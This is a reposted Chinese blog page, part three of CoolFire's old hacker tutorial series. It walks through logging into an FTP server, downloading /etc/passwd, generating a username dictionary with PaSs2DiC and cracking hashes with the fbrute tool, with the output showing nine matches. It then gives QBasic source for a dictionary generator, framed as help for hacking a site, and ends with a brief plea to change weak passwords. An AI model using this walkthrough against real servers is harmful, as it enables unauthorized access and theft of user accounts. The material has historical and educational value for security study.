coolfire文章之三

转载 2007年09月19日 19:39:00
(还是使用刚刚的帐号进入)

Name (www.coffee.com.tw:YourName): coffee

331 Password required for coffee.

Password:

230 User coffee logged in.

Remote system type is UNIX.

Using binary mode to transfer files.

(直接到达档案放置地点)

ftp> cd /etc

250 CWD command successful.

ftp> ls

200 PORT command successful.

150 Opening ASCII mode data connection for file list.

ttys

fdprm

group

issue

motd

mtools

profile

securetty

shells

termcap

skel

csh.cshrc

csh.login

lilo

inet

default

services

HOSTNAME

DIR_COLORS

passwd

passwd.OLD

wtmp

utmp

gettydefs

inittab.gettyps.sample

ld.so.conf

ld.so.cache

at.deny

fs

magic

rc.d

syslog.conf

printcap

inittab

sudoers

vga

diphosts

mail.rc

ppp

NNTP_INEWS_DOMAIN

sendmail.st

NETWORKING

gateways

bootptab

exports

ftpusers

host.conf

hosts

hosts.allow

hosts.deny

hosts.equiv

inetd.conf

named.boot

networks

nntpserver

protocols

resolv.conf

rpc

ftpaccess

hosts.lpd

ftpconversions

snooptab

msgs

ftpgroups

slip.login

slip.hosts

yp.conf.example

X11

lilo.conf

sendmail.cf

fstab

fastboot

mtab

syslog.pid

klogd.pid

shutdownpid

localtime

passwd.old

ioctl.save

psdevtab

ftp.banner

ftp.deny

issue.net

motd.bak

securetty.old

226 Transfer complete.

(取回该档案)

ftp> get passwd

200 PORT command successful.

150 Opening BINARY mode data connection for passwd (4081 bytes).

226 Transfer complete.

4081 bytes received in 2.5 seconds (1.6 Kbytes/s)

(尽速离开)

ftp> bye

221 Goodbye.

好了! 有了 /etc/passwd 之後一切都好办了, 赶紧将你的宝贝收藏 PaSs2DiC 拿出来吧 !!

快点跑一下, 让它自动产生字典档案:

C:/hack>pass2dic

PaSs2DiC V0.2 (C)1996 By FETAG Software Development Co. R.O.C. TAIWAN.

This tool will:

[1] Load PASSWD file and convert it to only username text file

[2] Write the file to a dictionary file you choise for target

Your Source PASSWD File Name: passwd

Your Target Dictionary Name: dic.cfe

PaSs2DiC Author: James Lin   E-Mail: fetag@stsvr.showtower.com.tw

FETAG Software Development Co: http://www.showtower.com.tw/~fetag

C:/hack>

(这样就好了 ! 自动产生的档案会放在 dic.cfe 这个档案中, 咱们跑一下 Brute Force 看看!)
C:/hack>fbrute passwd @dic.cfe

BRUTE!, Unix Brute Force Hacking Routine.  v2.0

Copyright (C) 1990, Prometheus.  DOS-fastcrypt made available by sir hackalot.

阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐

                                                                             

Attempts/Hits:  5184/9

                                                                             
Taking list input from dic.cfe

Beginning search of passwd for password: xxx

Match for password xxxxxx found!  Username: xxxxxx

Match for password xxxxx found!  Username: xxxxx

Match for password xxx found!  Username: xxx

Match for password xxxxxx found!  Username: xxxxxx

Match for password xxxxxx found!  Username: xxxxxx

Match for password coffee found!  Username: coffee

Match for password xxxxxxx found!  Username: xxxxxxx

Match for password xxx found!  Username: xxx

Match for password xxxx found!  Username: xxxx

Done.

C:/hack>

看! 除了 coffee 外还是有许多人使用与 ID 相同的字作为密码, 实在是....@#$%^...&* 因某些关系

所以其它部份要被 "马赛克" 起来, 请各位读者见量!

**** 再谈密码 ****

看了以上的破解示范, 就可以  解到许多人还是对於 "密码" 这东西不是很有 "密码" 的观念, 人就是

那么的懒, 随便设定一个好记的, 但是这种密码确是最不安全的, 上次我们谈到如何用 QBasic 来设计

一个自动产生密码的小程式, 相信对许多人有很大的帮助, 底下我们再来浅显的介绍一下字母密码的

产生方法, 相信对於你在 Hack 某站会有更大的帮助.

事情的开始是有一位网友 mail 给我, 问我字典档要如何写程式来 "自动扩大", 而让我有了写这一段的

想法, 现在我就针对这位网友的问题作一个更详细的说明 (因已简短回信答覆), 并且写出来让大家 

解一下, 当然我们的示范还是使用 QBasic, 因为这是最容易找到的程式了, 而且语法大家也可能会比较

熟悉一点, 如果我使用 VB 或 C 来写, 可能有些人只会拿去用, 而不会去修改或者写个好一点的出来!

先说明一下原理好了: 我们所要作的程式是一个自动产生字典档的程式, 所以我们要  解字的字母排

列到底有哪些方法可循?? 我们先举几个简单的单字出来比较看看:

  [1] apple   [2] guest  [3] james  [4] superman  [5] password 

OK! 来看看! 如果你有一点英文的概念的话应该会知道母音及子音吧 ! 我们首先这样说明: 母音在英文

上有 : A E I O U 这五个, 所有的英文单字都会有这些母音 (有些没有的可能是专有名词或缩写), 也有可

能是双母音的字, 如: au, ai, ea, ei, ia, ie, ou, oe, ui, ua... 等, 再来就是比较每个字的开头, 有可能是母音,

也有可能是子音, 但是子音之後通常接的是母音字母, 但是也有例外, 如: student 是两个子音再接一个母

音字母, 所以接下来依照常用字将这些子音找出来, 我想了一下大概有: br, bl, cl, dg, dr, fl, gr, kn, ph, st,

 sp, wh .... 等几种(其它请自行统计), 然後是结尾部份, 通常结尾部分有下列几种: e; est; ord; ard; ls; es; s...

等好多好多, 我们稍为思考一下就知道要如何写出这样的程式出来了 !! 我大略写一个简单的, 其它大家

自行发挥, 如果有人学语言学的, 请帮忙弄一份常用组合表出来, 可能会更有帮助吧 !!

底下就是该程式片段, 执行後会产生 MyDic.Txt 档, 大小为: 22,096 Bytes 共有 3120 个字的字典!!

--------------- MakeDic.BAS Start Here ---------------------------------------------------------------------------------------

DIM FirstWord$(20)

DIM MotherWord$(13)

DIM LastWord$(12)

DATA "br", "bl", "cl", "dg", "dr", "fl", "gr", "kn", "ph", "st", "sp", "s", "t", "p", "k" , "f", "m", "n", "b","k"

DATA "a", "e", "i", "o", "u", "ai", "ei", "ea", "io", "ou", "oi", "au", "eo"

DATA "st", "ord", "ard", "e", "es", "le", "ng", "st", "ing", "n", "b", "s"

FOR I = 1 TO 20

  READ FirstWord$(I)

  PRINT FirstWord$(I)

NEXT I

FOR I = 1 TO 13

  READ MotherWord$(I)

NEXT I

FOR I = 1 TO 12

  READ LastWord$(I)

NEXT I

OPEN "MyDic.txt" FOR OUTPUT AS #1

FOR I = 1 TO 20

   FOR J = 1 TO 13

       FOR K = 1 TO 12

           PRINT #1, FirstWord$(I) + MotherWord$(J) + LastWord$(K)

       NEXT K

   NEXT J

NEXT I

CLOSE : END

--------------- Cut Here, End of MakeDic.BAS --------------------------------------------------------------------------------

当然这只是小部份的组合, 相信你可以作出一个更大的字典档出来, 如: 子音+母音+子音+母音+子音, 作

出来的字典档会很吓人喔 !! 这一个部份就讲到这里了 ! 如果你有很棒的字典产生程式, 写好了请 Mail 一

份给我喔 !! 如果可以的话请说明是否可以公布在我的 W3 上让其它人下载 !! 还是你只是要给我 ?!

希望每次讲到密码的问题後, 大家可以将这些密码的产生方法与自己的密码对照看看, 如果有相同的请

赶紧将自己的密码换掉, 我讲得口沫横飞, 都没有人要听吗 ??? 咖啡业者...... ISP 们.... 教教你们的使用者吧..... 唉~~~~
 

Coolfire黑客入门系列

今天要给大家介绍的是本书叫:coolfire黑客入门系列。coolfire原名:林正隆,中国台湾著名黑客,中国黑客 界元老人物。2011年获得COG信息安全终身成就奖 。他在他的黑客入门系列开头写到这...
  • afjaklsdflka
  • afjaklsdflka
  • 2017年11月19日 21:06
  • 573

coolfire文章之二

这不是一个教学文件, 只是告诉你该如何破解系统, 好让你能够将自己的系统作安全的保护, 如果你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的电脑, 我是 CoolFire, 写这篇文章...
  • huanjieshuijing
  • huanjieshuijing
  • 2007年09月19日 19:37
  • 659

coolfire文章四

这不是一个教学文件, 只是告诉你该如何破解系统,好让你能够将自己的系统作安全的保护, 如果你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的电脑, 我是 CoolFire, 写这篇文章的...
  • huanjieshuijing
  • huanjieshuijing
  • 2007年09月19日 19:42
  • 649

coolfire文章之八

这不是一个教学文件, 只是告诉你该如何破解系统, 好让你能够将自己的系统作安全的保护, 如果你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的电脑,我是 CoolFire, 写这篇文章的...
  • huanjieshuijing
  • huanjieshuijing
  • 2007年09月19日 19:48
  • 733

coolfire文章之七

这不是一个教学文件, 只是告诉你该如何破解系统, 好让你能够将自己的系统作安全的保护, 如果你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的电脑,我是 CoolFire, 写这篇文章的...
  • huanjieshuijing
  • huanjieshuijing
  • 2007年09月19日 19:46
  • 1019

coolfire文章之一

这不是一个教学文件, 只是告诉你该如何破解系统, 好让你能够将自己的系统作安全的保护, 如果你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的电脑, 我是 CoolFire, 写这篇文章...
  • huanjieshuijing
  • huanjieshuijing
  • 2007年09月19日 19:33
  • 812

coolfire文章之六

这不是一个教学文件, 只是告诉你该如何破解系统, 好让你能够将自己的系统作安全的保护, 如果你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的电脑, 我是 CoolFire, 写这篇文章...
  • huanjieshuijing
  • huanjieshuijing
  • 2007年09月19日 19:44
  • 503

coolfire文章之五

这不是一个教学文件, 只是告诉你该如何破解系统,好让你能够将自己的系统作安全的保护, 如果你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的电脑, 我是 CoolFire, 写这篇文章的...
  • huanjieshuijing
  • huanjieshuijing
  • 2007年09月19日 19:43
  • 510

[转]coolfire黑客入门教程系列之(三)

CoolHC Volume 3 By CoolFire 这不是一个教学文件, 只是告诉你该如何破解系统, 好让你能够将自己的系统作安全的保护, 如果 你能够将这份文件完全看完, 你就能够知道电脑骇客们...
  • roofwei
  • roofwei
  • 2009年06月11日 18:58
  • 1381

电脑硬件

  PCI-Express技术于2002年年底被审核批准,而拥有PCI Express技术的产品于今年才正式面世。这项技术将在未来十年甚至更长的时间内解决带宽不足的问题。当前,PCI Express共...
  • ucshng
  • ucshng
  • 2007年06月07日 04:24
  • 15116
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:coolfire文章之三
举报原因:
原因补充:

(最多只允许输入30个字)